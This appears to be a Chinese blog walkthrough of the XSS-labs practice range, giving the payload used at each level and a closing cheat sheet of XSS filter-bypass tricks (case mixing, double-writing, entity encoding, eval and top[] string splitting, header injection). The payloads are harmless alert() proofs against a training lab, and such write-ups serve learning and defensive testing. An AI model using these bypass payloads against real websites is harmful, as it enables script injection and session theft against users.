XSS-labs闯关记录

最新推荐文章于 2024-05-21 14:11:46 发布
最新推荐文章于 2024-05-21 14:11:46 发布
阅读量60 收藏
点赞数
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/echo__h/article/details/130286428
版权

XSS-Labs闯关记录

文章目录

level1

image-20230420193943286

首先看到地址栏有name字段,有输入点和输出点

直接尝试有无过滤

image-20230420194116781

level2

image-20230420194212893

image-20230420194226568

看到地址栏中的参数输出在搜索框内,查看源码

image-20230420194355923

尝试构造payload,成功

xss" onclick="alert('xss')
level3

image-20230420202311742

image-20230420202245691

查看页面源代码发现单引号未被过滤,构造payload

xss' onclick='alert(1)
level4

image-20230420203207562

image-20230420203120741

双引号闭合,构造payload

xss" onclick="alert(1)
level5

image-20230420203427517

image-20230420203413216

双引号闭合,字符为过滤,构造payload后发现

image-20230420203603177

on事件行不通了 换一种思路 闭合input重新构造script语句,结果发现

image-20230420204301341

script也被过滤了,于是尝试超链接

"><a href=javascript:alert(1)>123</a>

点击插入的超链接,成功过关

level6

查看源代码发现是双引号闭合,经过测试href,script,on事件都被过滤了,尝试大小写绕过,成功过关

image-20230420205826001

"ONclick="alert(1)
level7

image-20230420210148571

测试发现on和script等被替换成了空,尝试双写绕过

"oonnclick = "alert(1)
level8

image-20230420210537870

输出点多了一个超链接,经过测试 javascript,on等都被替换了,于是尝试html实体字符绕过

image-20230420211708628

image-20230420211543034

level9

这里添加链接时一直显示链接不合法,经过测试后发现检查规则为链接必须包含http://,同时script等都被过滤,将除了http://的部分html实体转换,需要将http://注释掉,否则语法错误

image-20230420214029247

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;/*http://*/
level10

这关有点难,首先页面上没有输入点和输出点,get参数全都被过滤了,查看源码看到有隐藏的表单元素

F12修改代码,将表单元素显示,并添加按钮

image-20230420215242360

文本框随便输入内容点击按钮后发现t_sort文本框的内容留下了,于是针对这个文本框构造payload

t_link=111&t_history=111&t_sort=1111" onclick="alert(1)" type="button

点击生成的按钮,过关
image-20230420220235010

level11

同第十关,测试输出点在什么位置

image-20230421080333605

image-20230421080425688

可以看到同样是t_sort元素,构造payload闭合后发现,输入的payload被后台处理了,因此这个地方不是我们想要的输出点

image-20230421081058529

测试发现t_ref字段输入的是请求头中的refer字段信息

image-20230421082811420

构造payload

image-20230421082731285

level12

与上一关类似,不同的是这一关的输入点在User-Agent字段

image-20230421083009767

构造payload

image-20230421083129982

level13

抓包发现t_cook输入的内容为请求头中的Cookie字段

构造payload

image-20230421083616989

level14

需要访问外网,跳过

level15

输入点在ng-include包含中

image-20230421085039168

image-20230421085014942

构造payload,包含一个存在xss的网页

?src='./levle1.php?name=<img src=1 onerror=alert(1)/>‘

ng-include用法

1、ng-include 指令用于包含外部的 HTML文件。

2、包含的内容将作为指定元素的子节点。

3、ng-include 属性的值可以是一个表达式,返回一个文件名。

4、默认情况下,包含的文件需要包含在同一个域名下。

需要注意:

1.ng-include,如果单纯指定地址,必须要加引号

2.ng-include,加载外部html,script标签中的内容不执行

3.ng-include,加载外部html中含有style标签样式可以识别
level16

构造payload测试发现空格,script,/被替换了

image-20230421092730839

使用img标签,%0A换行绕过空格过滤

image-20230421093045344

?keyword=<img%0Asrc=1%0Aonerror=alert(1)>
level17

查看源码

image-20230421094004208

地址栏中的两个参数都添加到了src这里,构造payload

?arg01=111&arg02=222 onmouseover=alert(1)
level18

同上一关

?arg01=a&arg02=b onmouseover=alert(1)
level19

也是两个参数,构造payload发现特殊字符都被实体转义了

image-20230421094758998

这一关是flass xss 了解即可

?arg01=version&arg02=<a href="javascript:alert(1)">111</a>

level19 level20 略过

总结

查看页面的输入点和输出点(http头部,url地址栏,表单元素等),针对输出点构造payload

常用绕过方式

1.字符过滤绕过

  • 空格绕过
用/代替空格
<img/src="x"/onerror=alert("xss");>

用/**/ 代替空格
<img/src="x"/**/onerror=alert("xss");>
  • 大小写绕过
<ImG sRc=x onerRor=alert("xss");>
  • 双写绕过
<imimgg srsrcc=x onerror=alert("xss");>
  • 利用eval
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
  • 利用top
<script>top["al"+"ert"](`xss`);</script>

2.编码绕过

  • ASCII码绕过
  • url编码绕过
  • hex绕过
  • base64
ZeroK_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
渗透测试之---xss-labs闯关【1-14关】
qq_43168364的博客
04-18 2886
万能检测语句 <SCRscriptIPT>’”()Oonnjavascript 这条语句将给我们本次的闯关之旅带来极大的帮助 第一关 [Payload:<script>alert(/pig/)</script>] 首先看到了有查询字符串,我们心花怒放了。 先万能检测一下 好家伙啥都没有过滤,那就很easy了 第二关 [payload: ”>&......
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs靶场全通关
m0_52051132的博客
10-15 1473
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
xss-labs】闯关记录10~15
qq_43665434的博客
03-13 231
xss-labs】闯关记录10~15 【level10】传参注入 1、测试流程 尝试:<script>alert(/xss/)</script> 感觉像是被实体编码了 查看网页源代码: 果不其然是被html实体编码了,那这怎么办?又不在input标签内,没法构成事件。。 但是仔细看下面,有三个奇怪的表单: 于是构想是否能传参到这些表单中,造成事件的触发 于是构造payload: ?keyword=ninainaide&t_sort=" οnmοuseοver="al
xss-labs靶场通关详解
rev1ve的博客
08-30 1289
xss-labs通关详解1-20关
xss-labs】闯关记录16~18
qq_43665434的博客
03-13 221
xss-labs】闯关记录16~18 【level-16】%0a绕过空格 1、测试流程 扔一个payload:<script>alert(888)</script>试试: 结果发现关键字script和/都被替换为&nbsp; 于是换一个payload:<img src=1 onerror=alert(666)> 发现空格也被转义了。。。 用换行符%0a来代替空格: payload:<svg%0aonload=alert(000)> 2、源码分
xss-labs通关记 level1~8
qq_35258210的博客
01-08 645
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 level1 level2 level3 level4 level5 level6 level7 level8 level1 1、寻找插
xss-labs】闯关记录1~9
qq_43665434的博客
03-11 185
xss-labs】闯关记录1~9 【level2】 输入特殊符号+标识符 查看网页源代码: 发现8989出现了两处,一处是在h2标签中,<>已被html编码,而input标签中的value属性中也有一处输出,且没有编码。 于是构造payload:" ><script>alert(/qianxun/)</script> 成功弹窗! 总结:审计网页源码的时候一定要细心!细心!细心! 【level3】onfocus绕过编码 1、测试流程 如图所示,输出共有
跨站脚本攻击xss-labs(1-20)靶机练手
duoba_an的博客
03-03 1257
XSS又叫CSS(Cross Site Script)跨站脚本攻击,是指恶意攻击者往web页面中插入恶意代码,当用户浏览该网页时,嵌入其中的恶意代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击。XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,从而达到劫持用户会话的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了Web客户端的逻辑,在这个基础上,黑客或攻击者可以轻易地发动各种各样的攻击。
【sqli-labs】闯关记录17~20
qq_43665434的博客
03-10 171
【sqli-labs】闯关记录17~20 【less-17】基于密码的报错注入 1、源码分析 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); function check_input($value) { if(!empty($value)) { // truncation (see comments)
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
xss-labs.zip
06-25
xss-labs,该环境是用于练习xss跨站脚本攻击的一个集成环境,属于闯关类型。将该环境里的xss类型全部通过,有助于理解xss的攻击原理。
【SRC实战】文件名回显导致反射型XSS,URL重定向
qq_45196785的博客
05-15 272
2、修改文件名为meta标签,延迟1秒,自动重定向到第三方网站。1、反射型XSS获取用户cookie或者执行恶意JS操作。1、灯塔扫到敏感文件,发现1.txt会在页面回显文件名。“ 以下漏洞均为实验靶场,如有雷同,纯属巧合 ”3、修改文件名为script标签,触发XSS漏洞。2、URL重定向到仿冒网站导致用户账户被盗。“ 文件名回显,能否触发URL重定向?“ 文件名回显,能否触发XSS?2、修改文件名为del标签。3、重定向到第三方网站。
技术周总结 2024.05.13-05.19(计算机网络 & 浮点数不准确原因和解决 & java ThreadLocal & XSS)
xinkuaile的专栏
05-18 874
交换机&路由器区别; 以太网的前世今生
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 552
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 596
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
xss-labs第14关
08-18
- *3* [渗透测试之---xss-labs闯关【1-14关】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值